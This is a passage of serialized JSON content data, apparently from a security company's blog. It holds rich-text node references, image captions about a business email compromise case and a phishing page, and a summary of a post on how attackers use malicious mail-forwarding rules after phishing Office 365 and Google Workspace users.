ks":347782,"value":317735,"nodeType":173},{},[],{"data":347784,"content":347785,"nodeType":186},{"uri":317738},[347786],{"data":347787,"marks":347788,"value":317744,"nodeType":173},{},[347789],{"type":194},{"data":347791,"marks":347792,"value":317748,"nodeType":173},{},[],{"data":347794,"content":347795,"nodeType":178},{},[347796],{"data":347797,"marks":347798,"value":317755,"nodeType":173},{},[],{"data":347800,"content":347801,"nodeType":178},{},[347802,347805,347812],{"data":347803,"marks":347804,"value":317762,"nodeType":173},{},[],{"data":347806,"content":347807,"nodeType":186},{"uri":317765},[347808],{"data":347809,"marks":347810,"value":317771,"nodeType":173},{},[347811],{"type":194},{"data":347813,"marks":347814,"value":317775,"nodeType":173},{},[],{"data":347816,"content":347819,"nodeType":312},{"target":347817},{"sys":347818},{"id":317780,"type":317,"linkType":318},[],{"data":347821,"content":347822,"nodeType":178},{},[347823],{"data":347824,"marks":347825,"value":317789,"nodeType":173},{},[347826],{"type":370},{"data":347828,"content":347829,"nodeType":178},{},[347830],{"data":347831,"marks":347832,"value":317796,"nodeType":173},{},[],{"data":347834,"content":347835,"nodeType":178},{},[347836,347839,347846],{"data":347837,"marks":347838,"value":317803,"nodeType":173},{},[],{"data":347840,"content":347841,"nodeType":186},{"uri":317806},[347842],{"data":347843,"marks":347844,"value":317812,"nodeType":173},{},[347845],{"type":194},{"data":347847,"marks":347848,"value":317816,"nodeType":173},{},[],{"data":347850,"content":347851,"nodeType":178},{},[347852],{"data":347853,"marks":347854,"value":317824,"nodeType":173},{},[347855],{"type":370},{"data":347857,"content":347858,"nodeType":178},{},[347859,347862,347869],{"data":347860,"marks":347861,"value":317831,"nodeType":173},{},[],{"data":347863,"content":347864,"nodeType":186},{"uri":317834},[347865],{"data":347866,"marks":347867,"value":317840,"nodeType":173},{},[347868],{"type":194},{"data":347870,"marks":347871,"value":1477,"nodeType":173},{},[],{"data":347873,"content":347874,"nodeType":178},{},[347875],{"data":347876,"marks":347877,"value":317851,"nodeType":173},{},[347878],{"type":370},{"data":347880,"content":347881,"nodeType":178},{},[347882],{"data":347883,"marks":347884,"value":317858,"nodeType":173},{},[],{"data":347886,"content":347887,"nodeType":250},{},[347888,347897,347906,347915,347924],{"data":347889,"content":347890,"nodeType":254},{},[347891],{"data":347892,"content":347893,"nodeType":178},{},[347894],{"data":347895,"marks":347896,"value":317871,"nodeType":173},{},[],{"data":347898,"content":347899,"nodeType":254},{},[347900],{"data":347901,"content":347902,"nodeType":178},{},[347903],{"data":347904,"marks":347905,"value":317881,"nodeType":173},{},[],{"data":347907,"content":347908,"nodeType":254},{},[347909],{"data":347910,"content":347911,"nodeType":178},{},[347912],{"data":347913,"marks":347914,"value":317891,"nodeType":173},{},[],{"data":347916,"content":347917,"nodeType":254},{},[347918],{"data":347919,"content":347920,"nodeType":178},{},[347921],{"data":347922,"marks":347923,"value":317901,"nodeType":173},{},[],{"data":347925,"content":347926,"nodeType":254},{},[347927],{"data":347928,"content":347929,"nodeType":178},{},[347930],{"data":347931,"marks":347932,"value":317911,"nodeType":173},{},[],{"data":347934,"content":347935,"nodeType":178},{},[347936],{"data":347937,"marks":347938,"value":40632,"nodeType":173},{},[347939],{"type":370},{"data":347941,"content":347942,"nodeType":178},{},[347943],{"data":347944,"marks":347945,"value":317925,"nodeType":173},{},[],{"data":347947,"content":347950,"nodeType":312},{"target":347948},{"sys":347949},{"id":209109,"type":317,"linkType":318},[],{"data":347952,"content":347953,"nodeType":178},{},[347954],{"data":347955,"marks":347956,"value":37,"nodeType":173},{},[],[317597,317598,317599,317600,317601],{"items":347959},[347960,347962],{"sys":347961,"name":505},{"id":504},{"sys":347963,"name":509},{"id":508},{"items":347965},[347966],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":347967},{"url":19129},{"items":347969},[347970],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":347971},{"url":274167},{"json":347973,"links":348060},{"data":347974,"content":347975,"nodeType":165},{},[347976,347982,347985,347991,347997,348002,348008,348014,348020,348026,348032,348037,348043,348048,348054],{"data":347977,"content":347978,"nodeType":178},{},[347979],{"data":347980,"marks":347981,"value":346213,"nodeType":173},{},[],{"data":347983,"content":347984,"nodeType":231},{},[],{"data":347986,"content":347987,"nodeType":178},{},[347988],{"data":347989,"marks":347990,"value":346223,"nodeType":173},{},[],{"data":347992,"content":347993,"nodeType":178},{},[347994],{"data":347995,"marks":347996,"value":346230,"nodeType":173},{},[],{"data":347998,"content":348001,"nodeType":312},{"target":347999},{"sys":348000},{"id":346235,"type":317,"linkType":318},[],{"data":348003,"content":348004,"nodeType":178},{},[348005],{"data":348006,"marks":348007,"value":346243,"nodeType":173},{},[],{"data":348009,"content":348010,"nodeType":178},{},[348011],{"data":348012,"marks":348013,"value":346250,"nodeType":173},{},[],{"data":348015,"content":348016,"nodeType":178},{},[348017],{"data":348018,"marks":348019,"value":346257,"nodeType":173},{},[],{"data":348021,"content":348022,"nodeType":178},{},[348023],{"data":348024,"marks":348025,"value":346264,"nodeType":173},{},[],{"data":348027,"content":348028,"nodeType":178},{},[348029],{"data":348030,"marks":348031,"value":346271,"nodeType":173},{},[],{"data":348033,"content":348036,"nodeType":312},{"target":348034},{"sys":348035},{"id":317780,"type":317,"linkType":318},[],{"data":348038,"content":348039,"nodeType":178},{},[348040],{"data":348041,"marks":348042,"value":346283,"nodeType":173},{},[],{"data":348044,"content":348047,"nodeType":312},{"target":348045},{"sys":348046},{"id":346288,"type":317,"linkType":318},[],{"data":348049,"content":348050,"nodeType":178},{},[348051],{"data":348052,"marks":348053,"value":346296,"nodeType":173},{},[],{"data":348055,"content":348056,"nodeType":178},{},[348057],{"data":348058,"marks":348059,"value":346303,"nodeType":173},{},[],{"entries":348061},{"hyperlink":348062,"inline":348063,"block":348064},[],[],[348065,348073,348088],{"sys":348066,"__typename":5345,"title":348067,"caption":348068,"layoutMode":118,"file":348069},{"id":346235},"BEC example","An email sent from the attacker, executing the final stages of the Business Email Compromise (BEC) attack.",{"url":348070,"width":348071,"height":348072},"https://images.ctfassets.net/y1cdw1ablpvd/50pvGtctkN6sOtexSqU0pX/c212ca33b51ab9804bb944df8a45068f/2021-06-18_11-24-48.png",670,585,{"sys":348074,"__typename":335449,"content":348075,"title":348086,"buttonText":335462,"buttonUrl":118,"signupRedirectUrl":348087},{"id":317780},{"json":348076},{"data":348077,"content":348078,"nodeType":165},{},[348079],{"data":348080,"content":348081,"nodeType":178},{},[348082],{"data":348083,"marks":348084,"value":348085,"nodeType":173},{},[],"It takes less than two minutes to check all your Office 365 or Google Workspace mailboxes.","Use our free tool to check your user's mailboxes for malicious mail rules","/app/feature/detect-malicious-mail-rules/",{"sys":348089,"__typename":5345,"title":348090,"caption":348090,"layoutMode":118,"file":348091},{"id":346288},"Microsoft phishing page",{"url":348092,"width":348093,"height":348094},"https://images.ctfassets.net/y1cdw1ablpvd/RaFBDuo2BmCqZvnNRlX5E/51599d6d23ee89408b4a07a794f199fa/2021-06-18_15-47-24.png",731,683,"content:blog:case-study-business-email-compromise-bec-attack-nearly-cost-us-millions.json","blog/case-study-business-email-compromise-bec-attack-nearly-cost-us-millions.json","blog/case-study-business-email-compromise-bec-attack-nearly-cost-us-millions",{"_path":348099,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":348100,"ogImage":118,"summary":348102,"title":317594,"subtitle":118,"metaTitle":348113,"synopsis":317595,"hashTags":348114,"publishedDate":317603,"slug":317604,"tagsCollection":348115,"relatedBlogPostsCollection":348121,"authorsCollection":349899,"content":349903,"_id":350219,"_type":5439,"_source":5440,"_file":350220,"_stem":350221,"_extension":5439},"/blog/email-security-how-hackers-use-mail-rules-to-access-your-inbox",{"id":289406,"publishedAt":348101},"2026-01-30T09:44:27.371Z",{"json":348103},{"data":348104,"content":348105,"nodeType":165},{},[348106],{"data":348107,"content":348108,"nodeType":178},{},[348109],{"data":348110,"marks":348111,"value":348112,"nodeType":173},{},[],"After a successful phishing campaign against Office 365 and Google Workspace users, a malicious mail rule can be automatically created in the user’s mailbox that forwards sensitive emails to an external address. Learn the best way to protect your company.","How hackers use mail rules to access your inbox",[317597,317598,317599,317600,317601,317602],{"items":348116},[348117,348119],{"sys":348118,"name":505},{"id":504},{"sys":348120,"name":509},{"id":508},{"items":348122},[348123,348695,349421],{"__typename":1528,"sys":348124,"content":348125,"title":98341,"synopsis":98342,"hashTags":118,"publishedDate":98343,"slug":98344,"tagsCollection":348685,"authorsCollection":348691},{"id":97694},{"json":348126},{"nodeType":165,"data":348127,"content":348128},{},[348129,348135,348141,348147,348150,348157,348163,348179,348209,348214,348230,348235,348255,348258,348265,348271,348284,348297,348302,348308,348314,348319,348332,348335,348342,348348,348354,348360,348366,348369,348376,348382,348388,348404,348410,348417,348456,348462,348467,348473,348478,348484,348487,348494,348507,348513,348547,348557,348560,348567,348573,348579,348609,348615,348632,348637,348642,348645,348652,348658,348674,348679],{"nodeType":178,"data":348130,"content":348131},{},[348132],{"nodeType":173,"value":97703,"marks":348133,"data":348134},[],{},{"nodeType":178,"data":348136,"content":348137},{},[348138],{"nodeType":173,"value":97710,"marks":348139,"data":348140},[],{},{"nodeType":178,"data":348142,"content":348143},{},[348144],{"nodeType":173,"value":97717,"marks":348145,"data":348146},[],{},{"nodeType":231,"data":348148,"content":348149},{},[],{"nodeType":169,"data":348151,"content":348152},{},[348153],{"nodeType":173,"value":97727,"marks":348154,"data":348156},[348155],{"type":370},{},{"nodeType":178,"data":348158,"content":348159},{},[348160],{"nodeType":173,"value":97735,"marks":348161,"data":348162},[],{},{"nodeType":178,"data":348164,"content":348165},{},[348166,348169,348176],{"nodeType":173,"value":97742,"marks":348167,"data":348168},[],{},{"nodeType":186,"data":348170,"content":348171},{"uri":97747},[348172],{"nodeType":173,"value":97750,"marks":348173,"data":348175},[348174],{"type":194},{},{"nodeType":173,"value":97755,"marks":348177,"data":348178},[],{},{"nodeType":250,"data":348180,"content":348181},{},[348182,348191,348200],{"nodeType":254,"data":348183,"content":348184},{},[348185],{"nodeType":178,"data":348186,"content":348187},{},[348188],{"nodeType":173,"value":97768,"marks":348189,"data":348190},[],{},{"nodeType":254,"data":348192,"content":348193},{},[348194],{"nodeType":178,"data":348195,"content":348196},{},[348197],{"nodeType":173,"value":97778,"marks":348198,"data":348199},[],{},{"nodeType":254,"data":348201,"content":348202},{},[348203],{"nodeType":178,"data":348204,"content":348205},{},[348206],{"nodeType":173,"value":97788,"marks":348207,"data":348208},[],{},{"nodeType":312,"data":348210,"content":348213},{"target":348211},{"sys":348212},{"id":97795,"type":317,"linkType":318},[],{"nodeType":178,"data":348215,"content":348216},{},[348217,348220,348227],{"nodeType":173,"value":97801,"marks":348218,"data":348219},[],{},{"nodeType":186,"data":348221,"content":348222},{"uri":97806},[348223],{"nodeType":173,"value":97809,"marks":348224,"data":348226},[348225],{"type":194},{},{"nodeType":173,"value":97814,"marks":348228,"data":348229},[],{},{"nodeType":312,"data":348231,"content":348234},{"target":348232},{"sys":348233},{"id":97821,"type":317,"linkType":318},[],{"nodeType":178,"data":348236,"content":348237},{},[348238,348241,348245,348248,348252],{"nodeType":173,"value":97827,"marks":348239,"data":348240},[],{},{"nodeType":173,"value":97831,"marks":348242,"data":348244},[348243],{"type":370},{},{"nodeType":173,"value":97836,"marks":348246,"data":348247},[],{},{"nodeType":173,"value":5440,"marks":348249,"data":348251},[348250],{"type":370},{},{"nodeType":173,"value":97844,"marks":348253,"data":348254},[],{},{"nodeType":231,"data":348256,"content":348257},{},[],{"nodeType":169,"data":348259,"content":348260},{},[348261],{"nodeType":173,"value":97854,"marks":348262,"data":348264},[348263],{"type":370},{},{"nodeType":178,"data":348266,"content":348267},{},[348268],{"nodeType":173,"value":97862,"marks":348269,"data":348270},[],{},{"nodeType":178,"data":348272,"content":348273},{},[348274,348277,348281],{"nodeType":173,"value":97869,"marks":348275,"data":348276},[],{},{"nodeType":173,"value":4821,"marks":348278,"data":348280},[348279],{"type":1646},{},{"nodeType":173,"value":97877,"marks":348282,"data":348283},[],{},{"nodeType":178,"data":348285,"content":348286},{},[348287,348290,348294],{"nodeType":173,"value":97884,"marks":348288,"data":348289},[],{},{"nodeType":173,"value":97888,"marks":348291,"data":348293},[348292],{"type":370},{},{"nodeType":173,"value":197,"marks":348295,"data":348296},[],{},{"nodeType":312,"data":348298,"content":348301},{"target":348299},{"sys":348300},{"id":97899,"type":317,"linkType":318},[],{"nodeType":178,"data":348303,"content":348304},{},[348305],{"nodeType":173,"value":97905,"marks":348306,"data":348307},[],{},{"nodeType":178,"data":348309,"content":348310},{},[348311],{"nodeType":173,"value":97912,"marks":348312,"data":348313},[],{},{"nodeType":312,"data":348315,"content":348318},{"target":348316},{"sys":348317},{"id":97919,"type":317,"linkType":318},[],{"nodeType":178,"data":348320,"content":348321},{},[348322,348325,348329],{"nodeType":173,"value":97925,"marks":348323,"data":348324},[],{},{"nodeType":173,"value":97929,"marks":348326,"data":348328},[348327],{"type":370},{},{"nodeType":173,"value":97934,"marks":348330,"data":348331},[],{},{"nodeType":231,"data":348333,"content":348334},{},[],{"nodeType":169,"data":348336,"content":348337},{},[348338],{"nodeType":173,"value":97944,"marks":348339,"data":348341},[348340],{"type":370},{},{"nodeType":178,"data":348343,"content":348344},{},[348345],{"nodeType":173,"value":97952,"marks":348346,"data":348347},[],{},{"nodeType":178,"data":348349,"content":348350},{},[348351],{"nodeType":173,"value":97959,"marks":348352,"data":348353},[],{},{"nodeType":178,"data":348355,"content":348356},{},[348357],{"nodeType":173,"value":97966,"marks":348358,"data":348359},[],{},{"nodeType":178,"data":348361,"content":348362},{},[348363],{"nodeType":173,"value":97973,"marks":348364,"data":348365},[],{},{"nodeType":231,"data":348367,"content":348368},{},[],{"nodeType":169,"data":348370,"content":348371},{},[348372],{"nodeType":173,"value":97983,"marks":348373,"data":348375},[348374],{"type":370},{},{"nodeType":178,"data":348377,"content":348378},{},[348379],{"nodeType":173,"value":97991,"marks":348380,"data":348381},[],{},{"nodeType":178,"data":348383,"content":348384},{},[348385],{"nodeType":173,"value":97998,"marks":348386,"data":348387},[],{},{"nodeType":178,"data":348389,"content":348390},{},[348391,348394,348401],{"nodeType":173,"value":98005,"marks":348392,"data":348393},[],{},{"nodeType":186,"data":348395,"content":348396},{"uri":98010},[348397],{"nodeType":173,"value":98013,"marks":348398,"data":348400},[348399],{"type":194},{},{"nodeType":173,"value":98018,"marks":348402,"data":348403},[],{},{"nodeType":178,"data":348405,"content":348406},{},[348407],{"nodeType":173,"value":98025,"marks":348408,"data":348409},[],{},{"nodeType":178,"data":348411,"content":348412},{},[348413],{"nodeType":173,"value":98032,"marks":348414,"data":348416},[348415],{"type":370},{},{"nodeType":250,"data":348418,"content":348419},{},[348420,348429,348438,348447],{"nodeType":254,"data":348421,"content":348422},{},[348423],{"nodeType":178,"data":348424,"content":348425},{},[348426],{"nodeType":173,"value":81804,"marks":348427,"data":348428},[],{},{"nodeType":254,"data":348430,"content":348431},{},[348432],{"nodeType":178,"data":348433,"content":348434},{},[348435],{"nodeType":173,"value":98055,"marks":348436,"data":348437},[],{},{"nodeType":254,"data":348439,"content":348440},{},[348441],{"nodeType":178,"data":348442,"content":348443},{},[348444],{"nodeType":173,"value":98065,"marks":348445,"data":348446},[],{},{"nodeType":254,"data":348448,"content":348449},{},[348450],{"nodeType":178,"data":348451,"content":348452},{},[348453],{"nodeType":173,"value":98075,"marks":348454,"data":348455},[],{},{"nodeType":178,"data":348457,"content":348458},{},[348459],{"nodeType":173,"value":98082,"marks":348460,"data":348461},[],{},{"nodeType":312,"data":348463,"content":348466},{"target":348464},{"sys":348465},{"id":98089,"type":317,"linkType":318},[],{"nodeType":178,"data":348468,"content":348469},{},[348470],{"nodeType":173,"value":98095,"marks":348471,"data":348472},[],{},{"nodeType":312,"data":348474,"content":348477},{"target":348475},{"sys":348476},{"id":98102,"type":317,"linkType":318},[],{"nodeType":178,"data":348479,"content":348480},{},[348481],{"nodeType":173,"value":98108,"marks":348482,"data":348483},[],{},{"nodeType":231,"data":348485,"content":348486},{},[],{"nodeType":169,"data":348488,"content":348489},{},[348490],{"nodeType":173,"value":98118,"marks":348491,"data":348493},[348492],{"type":370},{},{"nodeType":178,"data":348495,"content":348496},{},[348497,348500,348504],{"nodeType":173,"value":98126,"marks":348498,"data":348499},[],{},{"nodeType":173,"value":98130,"marks":348501,"data":348503},[348502],{"type":370},{},{"nodeType":173,"value":197,"marks":348505,"data":348506},[],{},{"nodeType":178,"data":348508,"content":348509},{},[348510],{"nodeType":173,"value":98141,"marks":348511,"data":348512},[],{},{"nodeType":178,"data":348514,"content":348515},{},[348516,348519,348523,348526,348530,348533,348537,348540,348544],{"nodeType":173,"value":98148,"marks":348517,"data":348518},[],{},{"nodeType":173,"value":98152,"marks":348520,"data":348522},[348521],{"type":370},{},{"nodeType":173,"value":98157,"marks":348524,"data":348525},[],{},{"nodeType":173,"value":98161,"marks":348527,"data":348529},[348528],{"type":370},{},{"nodeType":173,"value":98166,"marks":348531,"data":348532},[],{},{"nodeType":173,"value":98161,"marks":348534,"data":348536},[348535],{"type":370},{},{"nodeType":173,"value":98174,"marks":348538,"data":348539},[],{},{"nodeType":173,"value":98178,"marks":348541,"data":348543},[348542],{"type":370},{},{"nodeType":173,"value":98183,"marks":348545,"data":348546},[],{},{"nodeType":178,"data":348548,"content":348549},{},[348550,348553],{"nodeType":173,"value":98190,"marks":348551,"data":348552},[],{},{"nodeType":173,"value":98194,"marks":348554,"data":348556},[348555],{"type":370},{},{"nodeType":231,"data":348558,"content":348559},{},[],{"nodeType":169,"data":348561,"content":348562},{},[348563],{"nodeType":173,"value":98205,"marks":348564,"data":348566},[348565],{"type":370},{},{"nodeType":178,"data":348568,"content":348569},{},[348570],{"nodeType":173,"value":98213,"marks":348571,"data":348572},[],{},{"nodeType":178,"data":348574,"content":348575},{},[348576],{"nodeType":173,"value":98220,"marks":348577,"data":348578},[],{},{"nodeType":250,"data":348580,"content":348581},{},[348582,348591,348600],{"nodeType":254,"data":348583,"content":348584},{},[348585],{"nodeType":178,"data":348586,"content":348587},{},[348588],{"nodeType":173,"value":98233,"marks":348589,"data":348590},[],{},{"nodeType":254,"data":348592,"content":348593},{},[348594],{"nodeType":178,"data":348595,"content":348596},{},[348597],{"nodeType":173,"value":98243,"marks":348598,"data":348599},[],{},{"nodeType":254,"data":348601,"content":348602},{},[348603],{"nodeType":178,"data":348604,"content":348605},{},[348606],{"nodeType":173,"value":98253,"marks":348607,"data":348608},[],{},{"nodeType":178,"data":348610,"content":348611},{},[348612],{"nodeType":173,"value":98260,"marks":348613,"data":348614},[],{},{"nodeType":178,"data":348616,"content":348617},{},[348618,348622,348629],{"nodeType":173,"value":98267,"marks":348619,"data":348621},[348620],{"type":370},{},{"nodeType":186,"data":348623,"content":348624},{"uri":98273},[348625],{"nodeType":173,"value":98276,"marks":348626,"data":348628},[348627],{"type":194},{},{"nodeType":173,"value":37,"marks":348630,"data":348631},[],{},{"nodeType":312,"data":348633,"content":348636},{"target":348634},{"sys":348635},{"id":98287,"type":317,"linkType":318},[],{"nodeType":312,"data":348638,"content":348641},{"target":348639},{"sys":348640},{"id":98293,"type":317,"linkType":318},[],{"nodeType":231,"data":348643,"content":348644},{},[],{"nodeType":169,"data":348646,"content":348647},{},[348648],{"nodeType":173,"value":18605,"marks":348649,"data":348651},[348650],{"type":370},{},{"nodeType":178,"data":348653,"content":348654},{},[348655],{"nodeType":173,"value":98309,"marks":348656,"data":348657},[],{},{"nodeType":178,"data":348659,"content":348660},{},[348661,348664,348671],{"nodeType":173,"value":61741,"marks":348662,"data":348663},[],{},{"nodeType":186,"data":348665,"content":348666},{"uri":98320},[348667],{"nodeType":173,"value":1472,"marks":348668,"data":348670},[348669],{"type":194},{},{"nodeType":173,"value":1477,"marks":348672,"data":348673},[],{},{"nodeType":312,"data":348675,"content":348678},{"target":348676},{"sys":348677},{"id":98333,"type":317,"linkType":318},[],{"nodeType":178,"data":348680,"content":348681},{},[348682],{"nodeType":173,"value":37,"marks":348683,"data":348684},[],{},{"items":348686},[348687,348689],{"sys":348688,"name":509},{"id":508},{"sys":348690,"name":505},{"id":504},{"items":348692},[348693],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":348694},{"url":1496},{"__typename":1528,"sys":348696,"content":348697,"title":140020,"synopsis":230548,"hashTags":118,"publishedDate":230549,"slug":230550,"tagsCollection":349411,"authorsCollection":349417},{"id":202149},{"json":348698},{"nodeType":165,"data":348699,"content":348700},{},[348701,348707,348713,348719,348725,348731,348737,348743,348749,348755,348760,348766,348772,348778,348824,348830,348836,348852,348858,348864,348870,348896,348909,348915,348921,348927,348933,348939,348945,348961,348977,349075,349081,349097,349103,349109,349115,349120,349126,349132,349138,349164,349170,349176,349206,349212,349218,349300,349315,349321,349327,349333,349339,349385,349391,349394,349400,349405],{"nodeType":178,"data":348702,"content":348703},{},[348704],{"nodeType":173,"value":229742,"marks":348705,"data":348706},[],{},{"nodeType":178,"data":348708,"content":348709},{},[348710],{"nodeType":173,"value":229749,"marks":348711,"data":348712},[],{},{"nodeType":178,"data":348714,"content":348715},{},[348716],{"nodeType":173,"value":229756,"marks":348717,"data":348718},[],{},{"nodeType":169,"data":348720,"content":348721},{},[348722],{"nodeType":173,"value":229763,"marks":348723,"data":348724},[],{},{"nodeType":178,"data":348726,"content":348727},{},[348728],{"nodeType":173,"value":229770,"marks":348729,"data":348730},[],{},{"nodeType":178,"data":348732,"content":348733},{},[348734],{"nodeType":173,"value":229777,"marks":348735,"data":348736},[],{},{"nodeType":178,"data":348738,"content":348739},{},[348740],{"nodeType":173,"value":229784,"marks":348741,"data":348742},[],{},{"nodeType":178,"data":348744,"content":348745},{},[348746],{"nodeType":173,"value":229791,"marks":348747,"data":348748},[],{},{"nodeType":178,"data":348750,"content":348751},{},[348752],{"nodeType":173,"value":229798,"marks":348753,"data":348754},[],{},{"nodeType":312,"data":348756,"content":348759},{"target":348757},{"sys":348758},{"id":229805,"type":317,"linkType":318},[],{"nodeType":235,"data":348761,"content":348762},{},[348763],{"nodeType":173,"value":229811,"marks":348764,"data":348765},[],{},{"nodeType":178,"data":348767,"content":348768},{},[348769],{"nodeType":173,"value":229818,"marks":348770,"data":348771},[],{},{"nodeType":178,"data":348773,"content":348774},{},[348775],{"nodeType":173,"value":229825,"marks":348776,"data":348777},[],{},{"nodeType":178,"data":348779,"content":348780},{},[348781,348784,348791,348794,348801,348804,348811,348814,348821],{"nodeType":173,"value":229832,"marks":348782,"data":348783},[],{},{"nodeType":186,"data":348785,"content":348786},{"uri":196192},[348787],{"nodeType":173,"value":196195,"marks":348788,"data":348790},[348789],{"type":194},{},{"nodeType":173,"value":2936,"marks":348792,"data":348793},[],{},{"nodeType":186,"data":348795,"content":348796},{"uri":196203},[348797],{"nodeType":173,"value":196206,"marks":348798,"data":348800},[348799],{"type":194},{},{"nodeType":173,"value":229853,"marks":348802,"data":348803},[],{},{"nodeType":186,"data":348805,"content":348806},{"uri":181618},[348807],{"nodeType":173,"value":181621,"marks":348808,"data":348810},[348809],{"type":194},{},{"nodeType":173,"value":229864,"marks":348812,"data":348813},[],{},{"nodeType":186,"data":348815,"content":348816},{"uri":196223},[348817],{"nodeType":173,"value":196226,"marks":348818,"data":348820},[348819],{"type":194},{},{"nodeType":173,"value":1477,"marks":348822,"data":348823},[],{},{"nodeType":178,"data":348825,"content":348826},{},[348827],{"nodeType":173,"value":229881,"marks":348828,"data":348829},[],{},{"nodeType":178,"data":348831,"content":348832},{},[348833],{"nodeType":173,"value":229888,"marks":348834,"data":348835},[],{},{"nodeType":178,"data":348837,"content":348838},{},[348839,348842,348849],{"nodeType":173,"value":229895,"marks":348840,"data":348841},[],{},{"nodeType":186,"data":348843,"content":348844},{"uri":229900},[348845],{"nodeType":173,"value":229903,"marks":348846,"data":348848},[348847],{"type":194},{},{"nodeType":173,"value":481,"marks":348850,"data":348851},[],{},{"nodeType":235,"data":348853,"content":348854},{},[348855],{"nodeType":173,"value":229914,"marks":348856,"data":348857},[],{},{"nodeType":178,"data":348859,"content":348860},{},[348861],{"nodeType":173,"value":229921,"marks":348862,"data":348863},[],{},{"nodeType":178,"data":348865,"content":348866},{},[348867],{"nodeType":173,"value":229928,"marks":348868,"data":348869},[],{},{"nodeType":178,"data":348871,"content":348872},{},[348873,348876,348883,348886,348893],{"nodeType":173,"value":229935,"marks":348874,"data":348875},[],{},{"nodeType":186,"data":348877,"content":348878},{"uri":180509},[348879],{"nodeType":173,"value":229942,"marks":348880,"data":348882},[348881],{"type":194},{},{"nodeType":173,"value":229947,"marks":348884,"data":348885},[],{},{"nodeType":186,"data":348887,"content":348888},{"uri":229952},[348889],{"nodeType":173,"value":229955,"marks":348890,"data":348892},[348891],{"type":194},{},{"nodeType":173,"value":229960,"marks":348894,"data":348895},[],{},{"nodeType":178,"data":348897,"content":348898},{},[348899,348902,348906],{"nodeType":173,"value":229967,"marks":348900,"data":348901},[],{},{"nodeType":173,"value":229971,"marks":348903,"data":348905},[348904],{"type":370},{},{"nodeType":173,"value":229976,"marks":348907,"data":348908},[],{},{"nodeType":178,"data":348910,"content":348911},{},[348912],{"nodeType":173,"value":229983,"marks":348913,"data":348914},[],{},{"nodeType":178,"data":348916,"content":348917},{},[348918],{"nodeType":173,"value":229990,"marks":348919,"data":348920},[],{},{"nodeType":169,"data":348922,"content":348923},{},[348924],{"nodeType":173,"value":229997,"marks":348925,"data":348926},[],{},{"nodeType":178,"data":348928,"content":348929},{},[348930],{"nodeType":173,"value":230004,"marks":348931,"data":348932},[],{},{"nodeType":178,"data":348934,"content":348935},{},[348936],{"nodeType":173,"value":230011,"marks":348937,"data":348938},[],{},{"nodeType":178,"data":348940,"content":348941},{},[348942],{"nodeType":173,"value":230018,"marks":348943,"data":348944},[],{},{"nodeType":178,"data":348946,"content":348947},{},[348948,348951,348958],{"nodeType":173,"value":230025,"marks":348949,"data":348950},[],{},{"nodeType":186,"data":348952,"content":348953},{"uri":230030},[348954],{"nodeType":173,"value":230033,"marks":348955,"data":348957},[348956],{"type":194},{},{"nodeType":173,"value":230038,"marks":348959,"data":348960},[],{},{"nodeType":178,"data":348962,"content":348963},{},[348964,348967,348974],{"nodeType":173,"value":230045,"marks":348965,"data":348966},[],{},{"nodeType":186,"data":348968,"content":348969},{"uri":88239},[348970],{"nodeType":173,"value":88245,"marks":348971,"data":348973},[348972],{"type":194},{},{"nodeType":173,"value":230056,"marks":348975,"data":348976},[],{},{"nodeType":250,"data":348978,"content":348979},{},[348980,348999,349018,349037,349056],{"nodeType":254,"data":348981,"content":348982},{},[348983],{"nodeType":178,"data":348984,"content":348985},{},[348986,348989,348996],{"nodeType":173,"value":37,"marks":348987,"data":348988},[],{},{"nodeType":186,"data":348990,"content":348991},{"uri":59347},[348992],{"nodeType":173,"value":230075,"marks":348993,"data":348995},[348994],{"type":194},{},{"nodeType":173,"value":37,"marks":348997,"data":348998},[],{},{"nodeType":254,"data":349000,"content":349001},{},[349002],{"nodeType":178,"data":349003,"content":349004},{},[349005,349008,349015],{"nodeType":173,"value":37,"marks":349006,"data":349007},[],{},{"nodeType":186,"data":349009,"content":349010},{"uri":230093},[349011],{"nodeType":173,"value":230096,"marks":349012,"data":349014},[349013],{"type":194},{},{"nodeType":173,"value":37,"marks":349016,"data":349017},[],{},{"nodeType":254,"data":349019,"content":349020},{},[349021],{"nodeType":178,"data":349022,"content":349023},{},[349024,349027,349034],{"nodeType":173,"value":37,"marks":349025,"data":349026},[],{},{"nodeType":186,"data":349028,"content":349029},{"uri":832},[349030],{"nodeType":173,"value":230116,"marks":349031,"data":349033},[349032],{"type":194},{},{"nodeType":173,"value":37,"marks":349035,"data":349036},[],{},{"nodeType":254,"data":349038,"content":349039},{},[349040],{"nodeType":178,"data":349041,"content":349042},{},[349043,349046,349053],{"nodeType":173,"value":37,"marks":349044,"data":349045},[],{},{"nodeType":186,"data":349047,"content":349048},{"uri":197688},[349049],{"nodeType":173,"value":230136,"marks":349050,"data":349052},[349051],{"type":194},{},{"nodeType":173,"value":37,"marks":349054,"data":349055},[],{},{"nodeType":254,"data":349057,"content":349058},{},[349059],{"nodeType":178,"data":349060,"content":349061},{},[349062,349065,349072],{"nodeType":173,"value":37,"marks":349063,"data":349064},[],{},{"nodeType":186,"data":349066,"content":349067},{"uri":144083},[349068],{"nodeType":173,"value":230156,"marks":349069,"data":349071},[349070],{"type":194},{},{"nodeType":173,"value":37,"marks":349073,"data":349074},[],{},{"nodeType":178,"data":349076,"content":349077},{},[349078],{"nodeType":173,"value":230167,"marks":349079,"data":349080},[],{},{"nodeType":178,"data":349082,"content":349083},{},[349084,349087,349094],{"nodeType":173,"value":230174,"marks":349085,"data":349086},[],{},{"nodeType":186,"data":349088,"content":349089},{"uri":63250},[349090],{"nodeType":173,"value":63256,"marks":349091,"data":349093},[349092],{"type":194},{},{"nodeType":173,"value":230185,"marks":349095,"data":349096},[],{},{"nodeType":169,"data":349098,"content":349099},{},[349100],{"nodeType":173,"value":230192,"marks":349101,"data":349102},[],{},{"nodeType":178,"data":349104,"content":349105},{},[349106],{"nodeType":173,"value":230199,"marks":349107,"data":349108},[],{},{"nodeType":178,"data":349110,"content":349111},{},[349112],{"nodeType":173,"value":230206,"marks":349113,"data":349114},[],{},{"nodeType":312,"data":349116,"content":349119},{"target":349117},{"sys":349118},{"id":230213,"type":317,"linkType":318},[],{"nodeType":178,"data":349121,"content":349122},{},[349123],{"nodeType":173,"value":230219,"marks":349124,"data":349125},[],{},{"nodeType":169,"data":349127,"content":349128},{},[349129],{"nodeType":173,"value":230226,"marks":349130,"data":349131},[],{},{"nodeType":178,"data":349133,"content":349134},{},[